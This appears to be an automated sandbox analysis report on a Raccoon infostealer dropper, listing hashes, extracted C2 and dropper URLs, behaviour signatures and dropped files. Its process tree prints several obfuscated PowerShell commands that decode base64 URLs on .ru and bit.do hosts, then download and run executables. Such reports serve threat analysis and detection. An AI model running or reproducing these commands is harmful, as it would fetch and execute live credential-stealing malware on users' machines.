Analysis

  • max time kernel
    47s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    04-02-2023 21:46

General

  • Target

    36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe

  • Size

    332KB

  • MD5

    5c011fd59a60dc0db2dee6f6aa60e79d

  • SHA1

    d0458c2cc16be344791f135d5dbd6cb68888ca29

  • SHA256

    36de4b0fc17f71c1081e39ce702680bef32f4a5ba60145bb9f6759691d1e3460

  • SHA512

    bce00a7b914a1b9018a2f114cba88e52f07f10d1237f77380e58c34fb32380f9c8ecaa2406fcec1d916c85b61a461f8c5dc1da35c63162449eee020ffb2ea2cc

  • SSDEEP

    6144:rWEVkoStOdrlqgh0p7DJ5cAT4HUV39zY1YfAh4Ua/apTBJ6:iECoStOHx2ppTV39Noh4Ua/apTr6

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://nicoslag.ru/asdfg.exe

exe.dropper

http://nicoslag.ru/asdfg.exe

Extracted

Family

raccoon

Botnet

75ea4cb7f040eb3056eaa4e86a3a9d6c

C2

http://91.215.85.146/

rc4.plain

Signatures

  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 2 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe
    "C:\Users\Admin\AppData\Local\Temp\36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe"
    Suspicious use of WriteProcessMemory
    PID:844
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe"
      Suspicious use of WriteProcessMemory
      PID:1156
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\m1.hta"
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        PID:1204
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL imhur $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;imhur pkzwjshtlmgd $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pkzwjshtlmgd;imhur brvxmhkwft $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JpWA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);brvxmhkwft $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
          Blocklisted process makes network request
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:1312
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\m1a.hta"
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        PID:760
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL cfgtiyleoxj $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;cfgtiyleoxj rxjawksc $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rxjawksc;cfgtiyleoxj lkhxvdgpjitz $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);lkhxvdgpjitz $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:1952
          • C:\Users\Public\brv.exe
            "C:\Users\Public\brv.exe"
            Checks computer location settings
            Executes dropped EXE
            Suspicious use of SetThreadContext
            Suspicious use of AdjustPrivilegeToken
            PID:2460
            • C:\Users\Public\brv.exe
              C:\Users\Public\brv.exe
              Executes dropped EXE
              PID:2568
      • C:\Windows\SysWOW64\timeout.exe
        timeout 1
        Delays execution with timeout.exe
        PID:1696
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b1.hta"
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        PID:1620
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL cfpdmyg $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;cfpdmyg pnuqyjbf $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pnuqyjbf;cfpdmyg josedgvxy $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JqaQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);josedgvxy $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
          Blocklisted process makes network request
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:816
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b1a.hta"
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL pgnfirdewovxsl $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;pgnfirdewovxsl ezosprk $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|ezosprk;pgnfirdewovxsl ctslxmfoz $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);ctslxmfoz $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
          Blocklisted process makes network request
          Loads dropped DLL
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          Suspicious use of WriteProcessMemory
          PID:1272
          • C:\Users\Public\brv.exe
            "C:\Users\Public\brv.exe"
            Checks computer location settings
            Executes dropped EXE
            Suspicious use of SetThreadContext
            Suspicious use of AdjustPrivilegeToken
            PID:2240
            • C:\Users\Public\brv.exe
              C:\Users\Public\brv.exe
              Executes dropped EXE
              PID:2592
      • C:\Windows\SysWOW64\timeout.exe
        timeout 2
        Delays execution with timeout.exe
        PID:1652
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b2.hta"
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        PID:1476
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vqaznm $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vqaznm amvlntpxjbs $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|amvlntpxjbs;vqaznm gbxlmur $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JqeA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);gbxlmur $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
          Blocklisted process makes network request
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:892
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b2a.hta"
        Suspicious use of WriteProcessMemory
        PID:1524
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xutrghv $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xutrghv hjlgdycxt $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|hjlgdycxt;xutrghv gbljpredwuxzv $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JyYXRpb3AucnUvYXNkZmcuZXhl';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);gbljpredwuxzv $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
          Blocklisted process makes network request
          Loads dropped DLL
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:268
          • C:\Users\Public\ych.exe
            "C:\Users\Public\ych.exe"
            Checks computer location settings
            Executes dropped EXE
            Suspicious use of SetThreadContext
            Suspicious use of AdjustPrivilegeToken
            PID:2304
            • C:\Users\Public\ych.exe
              C:\Users\Public\ych.exe
              Executes dropped EXE
              PID:2580

Network

MITRE ATT&CK Matrix

Collection

Command and Control

Credential Access

Execution

Exfiltration

Impact

Initial Access

Lateral Movement

Persistence

Privilege Escalation

Replay Monitor

00:00 00:00

Downloads

  • C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b1.hta
    Filesize

    11KB

    MD5

    d4aea3933a604f7dc3f9608929ef07b6

    SHA1

    95de25c9656d1503b30726760dc6764fa298461e

    SHA256

    9439c1e812b86678969732dd29d9a5c0d271db87005df6b36b79aab7556610e2

    SHA512

    61a1ba9e1d624a00585af95923641145c0fc1a56fac3de3094f8c1a3b7dee37b14088086cce2c78d154e23848d698a68145b44b3086221952ab65bddfc54c038

  • C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b1a.hta
    Filesize

    11KB

    MD5

    b8be7ddadc6d5361e90c28b4739274ac

    SHA1

    a225cf279c6cb7710141aeb3e0a29ad4c19e71e4

    SHA256

    152d6a623e294608e0fcfb331f0fd4e5eabd8d4b70673004d4ac33156add121c

    SHA512

    b4e0b038b7eb43838d7d7d2aad7acc9ee444ac913aa345103efb097c0b41fb70a6aff64e89e75925c4caa2f55d039b1c8121dcb0f540336f7bc6a93746bf9230

  • C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b2.hta
    Filesize

    11KB

    MD5

    611851be5c9d72fba0536042853b6b10

    SHA1

    b0ec6e71573902ca1e3fd17bc6fac96d5f232700

    SHA256

    a4965af6feb2c0f3d8c7f81808b77b10bfbb396bcc63fc430f8606b8cf14f24f

    SHA512

    db597666d50850628e17b2c91102b0d45ed613dfa62f3472e6c0e3fec51758347f7327958177a8ba85adc32ca7be7e7c92d7036999270cc84bba1cfcb93b7b33

  • C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b2a.hta
    Filesize

    11KB

    MD5

    1a98a8caf12608427d1b239c053a41fe

    SHA1

    870e04c385b65d5ba02637f99d12129b76ebae3b

    SHA256

    a9de29fa03e6b7a0d307e495a30bcc181064e67ba4c62b00eecbddcf11034002

    SHA512

    fb967e221882bb9dafec3d651a8031e4f53aed3231b76559a4c50292840fc8bfc496e75baf0f810d93694dbb94ef2cbd85f11cd774d075ab36846d85b4e70c0a

  • C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\m1.hta
    Filesize

    11KB

    MD5

    b89401d49ae639b07b31c8fb3a2b6660

    SHA1

    50e59ce06aa2bf94a11f64afef20961e76c9d426

    SHA256

    48382eae4aa1e069d09c4a5d25d22e9027b16b65a48911bfc0c8f1f23b1de4a2

    SHA512

    e03a5521a2ecba8d4063d5406d253139540958d510147f962180ad8333175837a8453bb3b69316bb7a8abe66670b42ef9567260f549cbbc2ebb293d2050188b8

  • C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\m1a.hta
    Filesize

    11KB

    MD5

    fd6a9f7c9cf2d58ef8935fa062eab5bf

    SHA1

    a3a03ce457d6820e4344abcbf90330c29aa8ab85

    SHA256

    83c6b29a8be68fa9c0cc88fec453da1c23a456bf330b2cfdff1968da576ec727

    SHA512

    f7598f335765d2e7ac08696e3db18261f8c8a7d901fad4c17839f8b5f1fca38ef38aa653971ddabfa95e9c5b446c4511e0716c0a636e427cb5fbb7eb349b7760

  • C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\start.bat
    Filesize

    152B

    MD5

    e57355079adb8a7e6a12c715d903bb0e

    SHA1

    c91b8e7418cca569a21c23235ee0e9f3fabd5bc5

    SHA256

    c5e6918b630712035a38f8dfc73645659d68504cc268b1a27db8bd81afe80457

    SHA512

    5a3992dd2cfe2ae9a1df92699759900d8d339139b0f41a46b19158397a20ff8fbd45aebd6bdd65651b1c02cf75d578be99128b90ecde4e90c7bb2c6a38cf438c

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    1e333438ff84ac126a654b2c0f63a42d

    SHA1

    ae99203eef6cba82c0950c56f1dbb6fd3a8a566f

    SHA256

    5cb5277a5eb093298c8686da50d892a63dd01ef513817776f10446fea4c671cd

    SHA512

    4fdf79f483a431f2bf6470d4022a72e4d3dc97fe4fea32444fa0852e5ffcea2cd2de4c233f2214f6adde6fb7ee777d615f764fe7ebabc4acee0a995b6031cc9a

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    1e333438ff84ac126a654b2c0f63a42d

    SHA1

    ae99203eef6cba82c0950c56f1dbb6fd3a8a566f

    SHA256

    5cb5277a5eb093298c8686da50d892a63dd01ef513817776f10446fea4c671cd

    SHA512

    4fdf79f483a431f2bf6470d4022a72e4d3dc97fe4fea32444fa0852e5ffcea2cd2de4c233f2214f6adde6fb7ee777d615f764fe7ebabc4acee0a995b6031cc9a

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    1e333438ff84ac126a654b2c0f63a42d

    SHA1

    ae99203eef6cba82c0950c56f1dbb6fd3a8a566f

    SHA256

    5cb5277a5eb093298c8686da50d892a63dd01ef513817776f10446fea4c671cd

    SHA512

    4fdf79f483a431f2bf6470d4022a72e4d3dc97fe4fea32444fa0852e5ffcea2cd2de4c233f2214f6adde6fb7ee777d615f764fe7ebabc4acee0a995b6031cc9a

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    1e333438ff84ac126a654b2c0f63a42d

    SHA1

    ae99203eef6cba82c0950c56f1dbb6fd3a8a566f

    SHA256

    5cb5277a5eb093298c8686da50d892a63dd01ef513817776f10446fea4c671cd

    SHA512

    4fdf79f483a431f2bf6470d4022a72e4d3dc97fe4fea32444fa0852e5ffcea2cd2de4c233f2214f6adde6fb7ee777d615f764fe7ebabc4acee0a995b6031cc9a

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    1e333438ff84ac126a654b2c0f63a42d

    SHA1

    ae99203eef6cba82c0950c56f1dbb6fd3a8a566f

    SHA256

    5cb5277a5eb093298c8686da50d892a63dd01ef513817776f10446fea4c671cd

    SHA512

    4fdf79f483a431f2bf6470d4022a72e4d3dc97fe4fea32444fa0852e5ffcea2cd2de4c233f2214f6adde6fb7ee777d615f764fe7ebabc4acee0a995b6031cc9a

  • C:\Users\Public\brv.exe
    Filesize

    831KB

    MD5

    f29f6dc54c33b2aae2950019ee54b04c

    SHA1

    c37d98a04edbe68fbd4e054fe0e96b1c926460ea

    SHA256

    8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

    SHA512

    3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

  • C:\Users\Public\brv.exe
    Filesize

    831KB

    MD5

    f29f6dc54c33b2aae2950019ee54b04c

    SHA1

    c37d98a04edbe68fbd4e054fe0e96b1c926460ea

    SHA256

    8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

    SHA512

    3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

  • C:\Users\Public\brv.exe
    Filesize

    831KB

    MD5

    f29f6dc54c33b2aae2950019ee54b04c

    SHA1

    c37d98a04edbe68fbd4e054fe0e96b1c926460ea

    SHA256

    8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

    SHA512

    3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

  • C:\Users\Public\brv.exe
    Filesize

    831KB

    MD5

    f29f6dc54c33b2aae2950019ee54b04c

    SHA1

    c37d98a04edbe68fbd4e054fe0e96b1c926460ea

    SHA256

    8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

    SHA512

    3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

  • C:\Users\Public\brv.exe
    Filesize

    831KB

    MD5

    f29f6dc54c33b2aae2950019ee54b04c

    SHA1

    c37d98a04edbe68fbd4e054fe0e96b1c926460ea

    SHA256

    8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

    SHA512

    3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

  • C:\Users\Public\brv.exe
    Filesize

    6KB

    MD5

    f251845a1ab43a12774e98a241c2bc4c

    SHA1

    71287491acf4fc24eda8c4eaeb50e01ca827acf2

    SHA256

    61faf60bd3fede8f96f33f86de8728bee226d1cdd164d5c569a5fa1de7148768

    SHA512

    036e74150fd4c8366f644431a3b7b397f00e46cc8a736971d66d383f459d1708641ca0d04d9b9b7865f868fdb17208f49090fca57ae2a9adec6207cf9c131f8c

  • C:\Users\Public\brv.exe
    Filesize

    6KB

    MD5

    f251845a1ab43a12774e98a241c2bc4c

    SHA1

    71287491acf4fc24eda8c4eaeb50e01ca827acf2

    SHA256

    61faf60bd3fede8f96f33f86de8728bee226d1cdd164d5c569a5fa1de7148768

    SHA512

    036e74150fd4c8366f644431a3b7b397f00e46cc8a736971d66d383f459d1708641ca0d04d9b9b7865f868fdb17208f49090fca57ae2a9adec6207cf9c131f8c

  • C:\Users\Public\ych.exe
    Filesize

    831KB

    MD5

    f29f6dc54c33b2aae2950019ee54b04c

    SHA1

    c37d98a04edbe68fbd4e054fe0e96b1c926460ea

    SHA256

    8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

    SHA512

    3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

  • C:\Users\Public\ych.exe
    Filesize

    831KB

    MD5

    f29f6dc54c33b2aae2950019ee54b04c

    SHA1

    c37d98a04edbe68fbd4e054fe0e96b1c926460ea

    SHA256

    8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

    SHA512

    3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

  • C:\Users\Public\ych.exe
    Filesize

    831KB

    MD5

    f29f6dc54c33b2aae2950019ee54b04c

    SHA1

    c37d98a04edbe68fbd4e054fe0e96b1c926460ea

    SHA256

    8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

    SHA512

    3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

  • \Users\Public\brv.exe
    Filesize

    831KB

    MD5

    f29f6dc54c33b2aae2950019ee54b04c

    SHA1

    c37d98a04edbe68fbd4e054fe0e96b1c926460ea

    SHA256

    8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

    SHA512

    3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

  • \Users\Public\ych.exe
    Filesize

    831KB

    MD5

    f29f6dc54c33b2aae2950019ee54b04c

    SHA1

    c37d98a04edbe68fbd4e054fe0e96b1c926460ea

    SHA256

    8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

    SHA512

    3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

  • memory/268-97-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/268-111-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/268-91-0x0000000000000000-mapping.dmp
  • memory/760-61-0x0000000000000000-mapping.dmp
  • memory/816-75-0x0000000000000000-mapping.dmp
  • memory/816-83-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/816-101-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/844-54-0x0000000075831000-0x0000000075833000-memory.dmp
    Filesize

    8KB

  • memory/844-66-0x0000000000400000-0x0000000000422000-memory.dmp
    Filesize

    136KB

  • memory/892-90-0x0000000000000000-mapping.dmp
  • memory/892-114-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/892-96-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/1156-55-0x0000000000000000-mapping.dmp
